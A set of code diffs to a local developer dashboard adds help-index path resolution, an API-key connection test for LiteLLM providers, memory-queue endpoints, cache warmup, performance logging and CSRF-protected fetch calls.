phase: state?.phase || 'unknown',
|
||||
total_findings: state?.total_findings || 0,
|
||||
issues_generated: state?.issues_generated || 0,
|
||||
priority_distribution: state?.priority_distribution || {},
|
||||
total_findings,
|
||||
issues_generated,
|
||||
priority_distribution,
|
||||
progress: progress?.progress || null
|
||||
};
|
||||
});
|
||||
|
||||
@@ -7,6 +7,29 @@ import { join } from 'path';
|
||||
import { homedir } from 'os';
|
||||
import type { RouteContext } from './types.js';
|
||||
|
||||
/**
|
||||
* Get the ccw-help index directory path (pure function)
|
||||
* Priority: project path (.claude/skills/ccw-help/index) > user path (~/.claude/skills/ccw-help/index)
|
||||
* @param projectPath - The project path to check first
|
||||
*/
|
||||
function getIndexDir(projectPath: string | null): string | null {
|
||||
// Try project path first
|
||||
if (projectPath) {
|
||||
const projectIndexDir = join(projectPath, '.claude', 'skills', 'ccw-help', 'index');
|
||||
if (existsSync(projectIndexDir)) {
|
||||
return projectIndexDir;
|
||||
}
|
||||
}
|
||||
|
||||
// Fall back to user path
|
||||
const userIndexDir = join(homedir(), '.claude', 'skills', 'ccw-help', 'index');
|
||||
if (existsSync(userIndexDir)) {
|
||||
return userIndexDir;
|
||||
}
|
||||
|
||||
return null;
|
||||
}
|
||||
|
||||
// ========== In-Memory Cache ==========
|
||||
interface CacheEntry {
|
||||
data: any;
|
||||
@@ -61,14 +84,15 @@ let watchersInitialized = false;
|
||||
|
||||
/**
|
||||
* Initialize file watchers for JSON indexes
|
||||
* @param projectPath - The project path to resolve index directory
|
||||
*/
|
||||
function initializeFileWatchers(): void {
|
||||
function initializeFileWatchers(projectPath: string | null): void {
|
||||
if (watchersInitialized) return;
|
||||
|
||||
const indexDir = join(homedir(), '.claude', 'skills', 'command-guide', 'index');
|
||||
const indexDir = getIndexDir(projectPath);
|
||||
|
||||
if (!existsSync(indexDir)) {
|
||||
console.warn(`Command guide index directory not found: ${indexDir}`);
|
||||
if (!indexDir) {
|
||||
console.warn(`ccw-help index directory not found in project or user paths`);
|
||||
return;
|
||||
}
|
||||
|
||||
@@ -152,15 +176,20 @@ function groupCommandsByCategory(commands: any[]): any {
|
||||
* @returns true if route was handled, false otherwise
|
||||
*/
|
||||
export async function handleHelpRoutes(ctx: RouteContext): Promise<boolean> {
|
||||
const { pathname, url, req, res } = ctx;
|
||||
const { pathname, url, req, res, initialPath } = ctx;
|
||||
|
||||
// Initialize file watchers on first request
|
||||
initializeFileWatchers();
|
||||
initializeFileWatchers(initialPath);
|
||||
|
||||
const indexDir = join(homedir(), '.claude', 'skills', 'command-guide', 'index');
|
||||
const indexDir = getIndexDir(initialPath);
|
||||
|
||||
// API: Get all commands with optional search
|
||||
if (pathname === '/api/help/commands') {
|
||||
if (!indexDir) {
|
||||
res.writeHead(404, { 'Content-Type': 'application/json' });
|
||||
res.end(JSON.stringify({ error: 'ccw-help index directory not found' }));
|
||||
return true;
|
||||
}
|
||||
const searchQuery = url.searchParams.get('q') || '';
|
||||
const filePath = join(indexDir, 'all-commands.json');
|
||||
|
||||
@@ -191,6 +220,11 @@ export async function handleHelpRoutes(ctx: RouteContext): Promise<boolean> {
|
||||
|
||||
// API: Get workflow command relationships
|
||||
if (pathname === '/api/help/workflows') {
|
||||
if (!indexDir) {
|
||||
res.writeHead(404, { 'Content-Type': 'application/json' });
|
||||
res.end(JSON.stringify({ error: 'ccw-help index directory not found' }));
|
||||
return true;
|
||||
}
|
||||
const filePath = join(indexDir, 'command-relationships.json');
|
||||
const relationships = getCachedData('command-relationships', filePath);
|
||||
|
||||
@@ -207,6 +241,11 @@ export async function handleHelpRoutes(ctx: RouteContext): Promise<boolean> {
|
||||
|
||||
// API: Get commands by category
|
||||
if (pathname === '/api/help/commands/by-category') {
|
||||
if (!indexDir) {
|
||||
res.writeHead(404, { 'Content-Type': 'application/json' });
|
||||
res.end(JSON.stringify({ error: 'ccw-help index directory not found' }));
|
||||
return true;
|
||||
}
|
||||
const filePath = join(indexDir, 'by-category.json');
|
||||
const byCategory = getCachedData('by-category', filePath);
|
||||
|
||||
|
||||
@@ -292,6 +292,14 @@ export async function handleLiteLLMApiRoutes(ctx: RouteContext): Promise<boolean
|
||||
return true;
|
||||
}
|
||||
|
||||
// Clean up health check service state for deleted provider
|
||||
try {
|
||||
const { getHealthCheckService } = await import('../services/health-check-service.js');
|
||||
getHealthCheckService().cleanupProvider(providerId);
|
||||
} catch (cleanupErr) {
|
||||
console.warn('[Provider Delete] Failed to cleanup health check state:', cleanupErr);
|
||||
}
|
||||
|
||||
broadcastToClients({
|
||||
type: 'LITELLM_PROVIDER_DELETED',
|
||||
payload: { providerId, timestamp: new Date().toISOString() }
|
||||
@@ -326,12 +334,43 @@ export async function handleLiteLLMApiRoutes(ctx: RouteContext): Promise<boolean
|
||||
return true;
|
||||
}
|
||||
|
||||
// Test connection using litellm client
|
||||
const client = getLiteLLMClient();
|
||||
const available = await client.isAvailable();
|
||||
// Get the API key to test (prefer first key from apiKeys array, fall back to default apiKey)
|
||||
let apiKeyValue: string | null = null;
|
||||
if (provider.apiKeys && provider.apiKeys.length > 0) {
|
||||
apiKeyValue = provider.apiKeys[0].key;
|
||||
} else if (provider.apiKey) {
|
||||
apiKeyValue = provider.apiKey;
|
||||
}
|
||||
|
||||
if (!apiKeyValue) {
|
||||
res.writeHead(200, { 'Content-Type': 'application/json' });
|
||||
res.end(JSON.stringify({ success: false, error: 'No API key configured for this provider' }));
|
||||
return true;
|
||||
}
|
||||
|
||||
// Resolve environment variables in the API key
|
||||
const { resolveEnvVar } = await import('../../config/litellm-api-config-manager.js');
|
||||
const resolvedKey = resolveEnvVar(apiKeyValue);
|
||||
|
||||
if (!resolvedKey) {
|
||||
res.writeHead(200, { 'Content-Type': 'application/json' });
|
||||
res.end(JSON.stringify({ success: false, error: 'API key is empty or environment variable not set' }));
|
||||
return true;
|
||||
}
|
||||
|
||||
// Determine API base URL
|
||||
const apiBase = provider.apiBase || getDefaultApiBase(provider.type);
|
||||
|
||||
// Test the API key connection
|
||||
const testResult = await testApiKeyConnection(provider.type, apiBase, resolvedKey);
|
||||
|
||||
res.writeHead(200, { 'Content-Type': 'application/json' });
|
||||
res.end(JSON.stringify({ success: available, provider: provider.type }));
|
||||
res.end(JSON.stringify({
|
||||
success: testResult.valid,
|
||||
provider: provider.type,
|
||||
latencyMs: testResult.latencyMs,
|
||||
error: testResult.error,
|
||||
}));
|
||||
} catch (err) {
|
||||
res.writeHead(500, { 'Content-Type': 'application/json' });
|
||||
res.end(JSON.stringify({ success: false, error: (err as Error).message }));
|
||||
|
||||
@@ -1256,5 +1256,89 @@ RULES: Be concise. Focus on practical understanding. Include function signatures
|
||||
return true;
|
||||
}
|
||||
|
||||
// API: Memory Queue - Add path to queue
|
||||
if (pathname === '/api/memory/queue/add' && req.method === 'POST') {
|
||||
handlePostRequest(req, res, async (body) => {
|
||||
const { path: modulePath, tool = 'gemini', strategy = 'single-layer' } = body;
|
||||
|
||||
if (!modulePath) {
|
||||
return { error: 'path is required', status: 400 };
|
||||
}
|
||||
|
||||
try {
|
||||
const { memoryQueueTool } = await import('../../tools/memory-update-queue.js');
|
||||
const result = await memoryQueueTool.execute({
|
||||
action: 'add',
|
||||
path: modulePath,
|
||||
tool,
|
||||
strategy
|
||||
}) as { queueSize?: number; willFlush?: boolean; flushed?: boolean };
|
||||
|
||||
// Broadcast queue update event
|
||||
broadcastToClients({
|
||||
type: 'MEMORY_QUEUE_UPDATED',
|
||||
payload: {
|
||||
action: 'add',
|
||||
path: modulePath,
|
||||
queueSize: result.queueSize || 0,
|
||||
willFlush: result.willFlush || false,
|
||||
flushed: result.flushed || false,
|
||||
timestamp: new Date().toISOString()
|
||||
}
|
||||
});
|
||||
|
||||
return { success: true, ...result };
|
||||
} catch (error: unknown) {
|
||||
return { error: (error as Error).message, status: 500 };
|
||||
}
|
||||
});
|
||||
return true;
|
||||
}
|
||||
|
||||
// API: Memory Queue - Get queue status
|
||||
if (pathname === '/api/memory/queue/status' && req.method === 'GET') {
|
||||
try {
|
||||
const { memoryQueueTool } = await import('../../tools/memory-update-queue.js');
|
||||
const result = await memoryQueueTool.execute({ action: 'status' }) as Record<string, unknown>;
|
||||
|
||||
res.writeHead(200, { 'Content-Type': 'application/json' });
|
||||
res.end(JSON.stringify({ success: true, ...result }));
|
||||
} catch (error: unknown) {
|
||||
res.writeHead(500, { 'Content-Type': 'application/json' });
|
||||
res.end(JSON.stringify({ error: (error as Error).message }));
|
||||
}
|
||||
return true;
|
||||
}
|
||||
|
||||
// API: Memory Queue - Flush queue immediately
|
||||
if (pathname === '/api/memory/queue/flush' && req.method === 'POST') {
|
||||
handlePostRequest(req, res, async () => {
|
||||
try {
|
||||
const { memoryQueueTool } = await import('../../tools/memory-update-queue.js');
|
||||
const result = await memoryQueueTool.execute({ action: 'flush' }) as {
|
||||
processed?: number;
|
||||
success?: boolean;
|
||||
errors?: unknown[];
|
||||
};
|
||||
|
||||
// Broadcast queue flushed event
|
||||
broadcastToClients({
|
||||
type: 'MEMORY_QUEUE_FLUSHED',
|
||||
payload: {
|
||||
processed: result.processed || 0,
|
||||
success: result.success || false,
|
||||
errors: result.errors?.length || 0,
|
||||
timestamp: new Date().toISOString()
|
||||
}
|
||||
});
|
||||
|
||||
return { success: true, ...result };
|
||||
} catch (error: unknown) {
|
||||
return { error: (error as Error).message, status: 500 };
|
||||
}
|
||||
});
|
||||
return true;
|
||||
}
|
||||
|
||||
return false;
|
||||
}
|
||||
|
||||
@@ -9,6 +9,15 @@ import { getCliToolsStatus } from '../../tools/cli-executor.js';
|
||||
import { checkVenvStatus, checkSemanticStatus } from '../../tools/codex-lens.js';
|
||||
import type { RouteContext } from './types.js';
|
||||
|
||||
// Performance logging helper
|
||||
const PERF_LOG_ENABLED = process.env.CCW_PERF_LOG === '1' || true; // Enable by default for debugging
|
||||
function perfLog(label: string, startTime: number, extra?: Record<string, unknown>): void {
|
||||
if (!PERF_LOG_ENABLED) return;
|
||||
const duration = Date.now() - startTime;
|
||||
const extraStr = extra ? ` | ${JSON.stringify(extra)}` : '';
|
||||
console.log(`[PERF][Status] ${label}: ${duration}ms${extraStr}`);
|
||||
}
|
||||
|
||||
/**
|
||||
* Check CCW installation status
|
||||
* Verifies that required workflow files are installed in user's home directory
|
||||
@@ -62,16 +71,39 @@ export async function handleStatusRoutes(ctx: RouteContext): Promise<boolean> {
|
||||
|
||||
// API: Aggregated Status (all statuses in one call)
|
||||
if (pathname === '/api/status/all') {
|
||||
const totalStart = Date.now();
|
||||
console.log('[PERF][Status] === /api/status/all START ===');
|
||||
|
||||
try {
|
||||
// Check CCW installation status (sync, fast)
|
||||
const ccwStart = Date.now();
|
||||
const ccwInstallStatus = checkCcwInstallStatus();
|
||||
perfLog('checkCcwInstallStatus', ccwStart);
|
||||
|
||||
// Execute all status checks in parallel with individual timing
|
||||
const cliStart = Date.now();
|
||||
const codexStart = Date.now();
|
||||
const semanticStart = Date.now();
|
||||
|
||||
// Execute all status checks in parallel
|
||||
const [cliStatus, codexLensStatus, semanticStatus] = await Promise.all([
|
||||
getCliToolsStatus(),
|
||||
checkVenvStatus(),
|
||||
getCliToolsStatus().then(result => {
|
||||
perfLog('getCliToolsStatus', cliStart, { toolCount: Object.keys(result).length });
|
||||
return result;
|
||||
}),
|
||||
checkVenvStatus().then(result => {
|
||||
perfLog('checkVenvStatus', codexStart, { ready: result.ready });
|
||||
return result;
|
||||
}),
|
||||
// Always check semantic status (will return available: false if CodexLens not ready)
|
||||
checkSemanticStatus().catch(() => ({ available: false, backend: null }))
|
||||
checkSemanticStatus()
|
||||
.then(result => {
|
||||
perfLog('checkSemanticStatus', semanticStart, { available: result.available });
|
||||
return result;
|
||||
})
|
||||
.catch(() => {
|
||||
perfLog('checkSemanticStatus (error)', semanticStart);
|
||||
return { available: false, backend: null };
|
||||
})
|
||||
]);
|
||||
|
||||
const response = {
|
||||
@@ -82,10 +114,13 @@ export async function handleStatusRoutes(ctx: RouteContext): Promise<boolean> {
|
||||
timestamp: new Date().toISOString()
|
||||
};
|
||||
|
||||
perfLog('=== /api/status/all TOTAL ===', totalStart);
|
||||
|
||||
res.writeHead(200, { 'Content-Type': 'application/json' });
|
||||
res.end(JSON.stringify(response));
|
||||
return true;
|
||||
} catch (error) {
|
||||
perfLog('=== /api/status/all ERROR ===', totalStart);
|
||||
console.error('[Status Routes] Error fetching aggregated status:', error);
|
||||
res.writeHead(500, { 'Content-Type': 'application/json' });
|
||||
res.end(JSON.stringify({ error: (error as Error).message }));
|
||||
|
||||
@@ -42,6 +42,10 @@ import { randomBytes } from 'crypto';
|
||||
// Import health check service
|
||||
import { getHealthCheckService } from './services/health-check-service.js';
|
||||
|
||||
// Import status check functions for warmup
|
||||
import { checkSemanticStatus, checkVenvStatus } from '../tools/codex-lens.js';
|
||||
import { getCliToolsStatus } from '../tools/cli-executor.js';
|
||||
|
||||
import type { ServerConfig } from '../types/config.js';
|
||||
import type { PostRequestHandler } from './routes/types.js';
|
||||
|
||||
@@ -290,6 +294,56 @@ function setCsrfCookie(res: http.ServerResponse, token: string, maxAgeSeconds: n
|
||||
appendSetCookie(res, attributes.join('; '));
|
||||
}
|
||||
|
||||
/**
|
||||
* Warmup function to pre-populate caches on server startup
|
||||
* This runs asynchronously and non-blocking after the server starts
|
||||
*/
|
||||
async function warmupCaches(initialPath: string): Promise<void> {
|
||||
console.log('[WARMUP] Starting cache warmup...');
|
||||
const startTime = Date.now();
|
||||
|
||||
// Run all warmup tasks in parallel for faster startup
|
||||
const warmupTasks = [
|
||||
// Warmup semantic status cache (Python process startup - can be slow first time)
|
||||
(async () => {
|
||||
const taskStart = Date.now();
|
||||
try {
|
||||
const semanticStatus = await checkSemanticStatus();
|
||||
console.log(`[WARMUP] Semantic status: ${semanticStatus.available ? 'available' : 'not available'} (${Date.now() - taskStart}ms)`);
|
||||
} catch (err) {
|
||||
console.warn(`[WARMUP] Semantic status check failed: ${(err as Error).message}`);
|
||||
}
|
||||
})(),
|
||||
|
||||
// Warmup venv status cache
|
||||
(async () => {
|
||||
const taskStart = Date.now();
|
||||
try {
|
||||
const venvStatus = await checkVenvStatus();
|
||||
console.log(`[WARMUP] Venv status: ${venvStatus.ready ? 'ready' : 'not ready'} (${Date.now() - taskStart}ms)`);
|
||||
} catch (err) {
|
||||
console.warn(`[WARMUP] Venv status check failed: ${(err as Error).message}`);
|
||||
}
|
||||
})(),
|
||||
|
||||
// Warmup CLI tools status cache
|
||||
(async () => {
|
||||
const taskStart = Date.now();
|
||||
try {
|
||||
const cliStatus = await getCliToolsStatus();
|
||||
const availableCount = Object.values(cliStatus).filter(s => s.available).length;
|
||||
const totalCount = Object.keys(cliStatus).length;
|
||||
console.log(`[WARMUP] CLI tools status: ${availableCount}/${totalCount} available (${Date.now() - taskStart}ms)`);
|
||||
} catch (err) {
|
||||
console.warn(`[WARMUP] CLI tools status check failed: ${(err as Error).message}`);
|
||||
}
|
||||
})()
|
||||
];
|
||||
|
||||
await Promise.allSettled(warmupTasks);
|
||||
console.log(`[WARMUP] Cache warmup complete (${Date.now() - startTime}ms total)`);
|
||||
}
|
||||
|
||||
/**
|
||||
* Generate dashboard HTML with embedded CSS and JS
|
||||
*/
|
||||
@@ -640,10 +694,24 @@ export async function startServer(options: ServerOptions = {}): Promise<http.Ser
|
||||
try {
|
||||
const healthCheckService = getHealthCheckService();
|
||||
healthCheckService.startAllHealthChecks(initialPath);
|
||||
|
||||
// Graceful shutdown: stop health checks when server closes
|
||||
server.on('close', () => {
|
||||
console.log('[Server] Shutting down health check service...');
|
||||
healthCheckService.stopAllHealthChecks();
|
||||
});
|
||||
} catch (err) {
|
||||
console.warn('[Server] Failed to start health check service:', err);
|
||||
}
|
||||
|
||||
// Start cache warmup asynchronously (non-blocking)
|
||||
// Uses setImmediate to not delay server startup response
|
||||
setImmediate(() => {
|
||||
warmupCaches(initialPath).catch((err) => {
|
||||
console.warn('[WARMUP] Cache warmup failed:', err);
|
||||
});
|
||||
});
|
||||
|
||||
resolve(server);
|
||||
});
|
||||
server.on('error', reject);
|
||||
|
||||
@@ -6,6 +6,28 @@
|
||||
|
||||
import type { ProviderType } from '../../types/litellm-api-config.js';
|
||||
|
||||
/**
|
||||
* Validate API base URL format
|
||||
* Note: This is a local development tool, so we allow localhost and internal networks
|
||||
* for users who run local API gateways or proxies.
|
||||
* @param url - The URL to validate
|
||||
* @returns Object with valid flag and optional error message
|
||||
*/
|
||||
export function validateApiBaseUrl(url: string): { valid: boolean; error?: string } {
|
||||
try {
|
||||
const parsed = new URL(url);
|
||||
|
||||
// Must be HTTP or HTTPS
|
||||
if (parsed.protocol !== 'https:' && parsed.protocol !== 'http:') {
|
||||
return { valid: false, error: 'URL must use HTTP or HTTPS protocol' };
|
||||
}
|
||||
|
||||
return { valid: true };
|
||||
} catch {
|
||||
return { valid: false, error: 'Invalid URL format' };
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Result of an API key connection test
|
||||
*/
|
||||
@@ -44,25 +66,30 @@ export async function testApiKeyConnection(
|
||||
apiKey: string,
|
||||
timeout: number = 10000
|
||||
): Promise<TestResult> {
|
||||
// Validate URL to prevent SSRF
|
||||
const urlValidation = validateApiBaseUrl(apiBase);
|
||||
if (!urlValidation.valid) {
|
||||
return { valid: false, error: urlValidation.error };
|
||||
}
|
||||
|
||||
// Normalize apiBase: remove trailing slashes to prevent URL construction issues
|
||||
// e.g., "https://api.openai.com/v1/" -> "https://api.openai.com/v1"
|
||||
const normalizedApiBase = apiBase.replace(/\/+$/, '');
|
||||
|
||||
const controller = new AbortController();
|
||||
const timeoutId = setTimeout(() => controller.abort(), timeout);
|
||||
const startTime = Date.now();
|
||||
|
||||
try {
|
||||
if (providerType === 'anthropic') {
|
||||
// Anthropic format: POST /v1/messages with minimal payload
|
||||
const response = await fetch(`${apiBase}/messages`, {
|
||||
method: 'POST',
|
||||
// Anthropic format: Use /v1/models endpoint (no cost, no model dependency)
|
||||
// This validates the API key without making a billable request
|
||||
const response = await fetch(`${normalizedApiBase}/models`, {
|
||||
method: 'GET',
|
||||
headers: {
|
||||
'Content-Type': 'application/json',
|
||||
'x-api-key': apiKey,
|
||||
'anthropic-version': '2023-06-01',
|
||||
},
|
||||
body: JSON.stringify({
|
||||
model: 'claude-3-haiku-20240307',
|
||||
max_tokens: 1,
|
||||
messages: [{ role: 'user', content: 'Hi' }],
|
||||
}),
|
||||
signal: controller.signal,
|
||||
});
|
||||
|
||||
@@ -77,7 +104,7 @@ export async function testApiKeyConnection(
|
||||
const errorBody = await response.json().catch(() => ({}));
|
||||
const errorMessage = (errorBody as any)?.error?.message || response.statusText;
|
||||
|
||||
// 401 = invalid API key, other 4xx might be valid key with other issues
|
||||
// 401 = invalid API key
|
||||
if (response.status === 401) {
|
||||
return { valid: false, error: 'Invalid API key' };
|
||||
}
|
||||
@@ -91,8 +118,10 @@ export async function testApiKeyConnection(
|
||||
|
||||
return { valid: false, error: errorMessage };
|
||||
} else {
|
||||
// OpenAI-compatible format: GET /v1/models
|
||||
const modelsUrl = apiBase.endsWith('/v1') ? `${apiBase}/models` : `${apiBase}/v1/models`;
|
||||
// OpenAI-compatible format: GET /v{N}/models
|
||||
// Detect if URL already ends with a version pattern like /v1, /v2, /v4, etc.
|
||||
const hasVersionSuffix = /\/v\d+$/.test(normalizedApiBase);
|
||||
const modelsUrl = hasVersionSuffix ? `${normalizedApiBase}/models` : `${normalizedApiBase}/v1/models`;
|
||||
const response = await fetch(modelsUrl, {
|
||||
method: 'GET',
|
||||
headers: {
|
||||
|
||||
@@ -330,6 +330,32 @@ export class HealthCheckService {
|
||||
getMonitoredProviders(): string[] {
|
||||
return Array.from(this.timers.keys());
|
||||
}
|
||||
|
||||
/**
|
||||
* Clean up all state for a deleted provider
|
||||
* Call this when a provider is deleted to prevent memory leaks
|
||||
* @param providerId - The provider ID to clean up
|
||||
*/
|
||||
cleanupProvider(providerId: string): void {
|
||||
// Stop health check timer
|
||||
this.stopHealthCheck(providerId);
|
||||
|
||||
// Remove all key states for this provider
|
||||
const keysToRemove: string[] = [];
|
||||
for (const key of this.keyStates.keys()) {
|
||||
if (key.startsWith(`${providerId}:`)) {
|
||||
keysToRemove.push(key);
|
||||
}
|
||||
}
|
||||
|
||||
for (const key of keysToRemove) {
|
||||
this.keyStates.delete(key);
|
||||
}
|
||||
|
||||
if (keysToRemove.length > 0) {
|
||||
console.log(`[HealthCheck] Cleaned up ${keysToRemove.length} key state(s) for deleted provider ${providerId}`);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
|
||||
@@ -304,6 +304,51 @@
|
||||
margin-top: 0;
|
||||
}
|
||||
|
||||
/* Environment File Input Group */
|
||||
.env-file-input-group {
|
||||
display: flex;
|
||||
flex-direction: column;
|
||||
gap: 0.5rem;
|
||||
}
|
||||
|
||||
.env-file-input-row {
|
||||
display: flex;
|
||||
gap: 0.5rem;
|
||||
align-items: center;
|
||||
}
|
||||
|
||||
.env-file-input-row .tool-config-input {
|
||||
flex: 1;
|
||||
font-family: ui-monospace, SFMono-Regular, Menlo, Monaco, Consolas, monospace;
|
||||
font-size: 0.8125rem;
|
||||
margin-top: 0;
|
||||
}
|
||||
|
||||
.env-file-input-row .btn-sm {
|
||||
flex-shrink: 0;
|
||||
display: inline-flex;
|
||||
align-items: center;
|
||||
gap: 0.25rem;
|
||||
padding: 0.5rem 0.75rem;
|
||||
font-size: 0.8125rem;
|
||||
white-space: nowrap;
|
||||
}
|
||||
|
||||
.env-file-hint {
|
||||
display: flex;
|
||||
align-items: center;
|
||||
gap: 0.375rem;
|
||||
font-size: 0.75rem;
|
||||
color: hsl(var(--muted-foreground));
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
}
|
||||
|
||||
.env-file-hint i {
|
||||
flex-shrink: 0;
|
||||
opacity: 0.7;
|
||||
}
|
||||
|
||||
.btn-ghost.text-destructive:hover {
|
||||
background: hsl(var(--destructive) / 0.1);
|
||||
}
|
||||
|
||||
@@ -174,7 +174,7 @@ function refreshRecentPaths() {
|
||||
*/
|
||||
async function removeRecentPathFromList(path) {
|
||||
try {
|
||||
const response = await fetch('/api/remove-recent-path', {
|
||||
const response = await csrfFetch('/api/remove-recent-path', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ path })
|
||||
|
||||
@@ -33,11 +33,14 @@ function initCliStatus() {
|
||||
* Load all statuses using aggregated endpoint (single API call)
|
||||
*/
|
||||
async function loadAllStatuses() {
|
||||
const totalStart = performance.now();
|
||||
console.log('[PERF][Frontend] loadAllStatuses START');
|
||||
|
||||
// 1. 尝试从缓存获取(预加载的数据)
|
||||
if (window.cacheManager) {
|
||||
const cached = window.cacheManager.get('all-status');
|
||||
if (cached) {
|
||||
console.log('[CLI Status] Loaded all statuses from cache');
|
||||
console.log(`[PERF][Frontend] Cache hit: ${(performance.now() - totalStart).toFixed(1)}ms`);
|
||||
// 应用缓存数据
|
||||
cliToolStatus = cached.cli || {};
|
||||
codexLensStatus = cached.codexLens || { ready: false };
|
||||
@@ -45,25 +48,32 @@ async function loadAllStatuses() {
|
||||
ccwInstallStatus = cached.ccwInstall || { installed: true, workflowsInstalled: true, missingFiles: [], installPath: '' };
|
||||
|
||||
// Load CLI tools config, API endpoints, and CLI Settings(这些有自己的缓存)
|
||||
const configStart = performance.now();
|
||||
await Promise.all([
|
||||
loadCliToolsConfig(),
|
||||
loadApiEndpoints(),
|
||||
loadCliSettingsEndpoints()
|
||||
]);
|
||||
console.log(`[PERF][Frontend] Config/Endpoints load: ${(performance.now() - configStart).toFixed(1)}ms`);
|
||||
|
||||
// Update badges
|
||||
updateCliBadge();
|
||||
updateCodexLensBadge();
|
||||
updateCcwInstallBadge();
|
||||
|
||||
console.log(`[PERF][Frontend] loadAllStatuses TOTAL (cached): ${(performance.now() - totalStart).toFixed(1)}ms`);
|
||||
return cached;
|
||||
}
|
||||
}
|
||||
|
||||
// 2. 缓存未命中,从服务器获取
|
||||
try {
|
||||
const fetchStart = performance.now();
|
||||
console.log('[PERF][Frontend] Fetching /api/status/all...');
|
||||
const response = await fetch('/api/status/all');
|
||||
if (!response.ok) throw new Error('Failed to load status');
|
||||
const data = await response.json();
|
||||
console.log(`[PERF][Frontend] /api/status/all fetch: ${(performance.now() - fetchStart).toFixed(1)}ms`);
|
||||
|
||||
// 存入缓存
|
||||
if (window.cacheManager) {
|
||||
@@ -77,10 +87,11 @@ async function loadAllStatuses() {
|
||||
ccwInstallStatus = data.ccwInstall || { installed: true, workflowsInstalled: true, missingFiles: [], installPath: '' };
|
||||
|
||||
// Load CLI tools config, API endpoints, and CLI Settings
|
||||
await Promise.all([
|
||||
loadCliToolsConfig(),
|
||||
loadApiEndpoints(),
|
||||
loadCliSettingsEndpoints()
|
||||
const configStart = performance.now();
|
||||
const [configResult, endpointsResult, settingsResult] = await Promise.all([
|
||||
loadCliToolsConfig().then(r => { console.log(`[PERF][Frontend] loadCliToolsConfig: ${(performance.now() - configStart).toFixed(1)}ms`); return r; }),
|
||||
loadApiEndpoints().then(r => { console.log(`[PERF][Frontend] loadApiEndpoints: ${(performance.now() - configStart).toFixed(1)}ms`); return r; }),
|
||||
loadCliSettingsEndpoints().then(r => { console.log(`[PERF][Frontend] loadCliSettingsEndpoints: ${(performance.now() - configStart).toFixed(1)}ms`); return r; })
|
||||
]);
|
||||
|
||||
// Update badges
|
||||
@@ -88,9 +99,11 @@ async function loadAllStatuses() {
|
||||
updateCodexLensBadge();
|
||||
updateCcwInstallBadge();
|
||||
|
||||
console.log(`[PERF][Frontend] loadAllStatuses TOTAL: ${(performance.now() - totalStart).toFixed(1)}ms`);
|
||||
return data;
|
||||
} catch (err) {
|
||||
console.error('Failed to load aggregated status:', err);
|
||||
console.log(`[PERF][Frontend] loadAllStatuses ERROR after: ${(performance.now() - totalStart).toFixed(1)}ms`);
|
||||
// Fallback to individual calls if aggregated endpoint fails
|
||||
return await loadAllStatusesFallback();
|
||||
}
|
||||
@@ -350,7 +363,7 @@ async function loadCliToolsConfig() {
|
||||
*/
|
||||
async function updateCliToolEnabled(tool, enabled) {
|
||||
try {
|
||||
const response = await fetch('/api/cli/tools-config/' + tool, {
|
||||
const response = await csrfFetch('/api/cli/tools-config/' + tool, {
|
||||
method: 'PUT',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ enabled: enabled })
|
||||
@@ -796,7 +809,7 @@ function setDefaultCliTool(tool) {
|
||||
// Save to config
|
||||
if (window.claudeCliToolsConfig) {
|
||||
window.claudeCliToolsConfig.defaultTool = tool;
|
||||
fetch('/api/cli/tools-config', {
|
||||
csrfFetch('/api/cli/tools-config', {
|
||||
method: 'PUT',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ defaultTool: tool })
|
||||
@@ -851,7 +864,7 @@ function getCacheInjectionMode() {
|
||||
|
||||
async function setCacheInjectionMode(mode) {
|
||||
try {
|
||||
const response = await fetch('/api/cli/tools-config/cache', {
|
||||
const response = await csrfFetch('/api/cli/tools-config/cache', {
|
||||
method: 'PUT',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ injectionMode: mode })
|
||||
@@ -1021,7 +1034,7 @@ async function startCodexLensInstall() {
|
||||
}, 1500);
|
||||
|
||||
try {
|
||||
const response = await fetch('/api/codexlens/bootstrap', {
|
||||
const response = await csrfFetch('/api/codexlens/bootstrap', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({})
|
||||
@@ -1034,6 +1047,15 @@ async function startCodexLensInstall() {
|
||||
progressBar.style.width = '100%';
|
||||
statusText.textContent = 'Installation complete!';
|
||||
|
||||
// 清理缓存以确保刷新后获取最新状态
|
||||
if (window.cacheManager) {
|
||||
window.cacheManager.invalidate('all-status');
|
||||
window.cacheManager.invalidate('dashboard-init');
|
||||
}
|
||||
if (typeof window.invalidateCodexLensCache === 'function') {
|
||||
window.invalidateCodexLensCache();
|
||||
}
|
||||
|
||||
setTimeout(() => {
|
||||
closeCodexLensInstallWizard();
|
||||
showRefreshToast('CodexLens installed successfully!', 'success');
|
||||
@@ -1171,7 +1193,7 @@ async function startCodexLensUninstall() {
|
||||
}, 500);
|
||||
|
||||
try {
|
||||
const response = await fetch('/api/codexlens/uninstall', {
|
||||
const response = await csrfFetch('/api/codexlens/uninstall', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({})
|
||||
@@ -1184,6 +1206,15 @@ async function startCodexLensUninstall() {
|
||||
progressBar.style.width = '100%';
|
||||
statusText.textContent = 'Uninstallation complete!';
|
||||
|
||||
// 清理缓存以确保刷新后获取最新状态
|
||||
if (window.cacheManager) {
|
||||
window.cacheManager.invalidate('all-status');
|
||||
window.cacheManager.invalidate('dashboard-init');
|
||||
}
|
||||
if (typeof window.invalidateCodexLensCache === 'function') {
|
||||
window.invalidateCodexLensCache();
|
||||
}
|
||||
|
||||
setTimeout(() => {
|
||||
closeCodexLensUninstallWizard();
|
||||
showRefreshToast('CodexLens uninstalled successfully!', 'success');
|
||||
@@ -1257,7 +1288,7 @@ async function initCodexLensIndex() {
|
||||
console.log('[CodexLens] Initializing index for path:', targetPath);
|
||||
|
||||
try {
|
||||
const response = await fetch('/api/codexlens/init', {
|
||||
const response = await csrfFetch('/api/codexlens/init', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ path: targetPath })
|
||||
@@ -1424,7 +1455,7 @@ async function startSemanticInstall() {
|
||||
}, 2000);
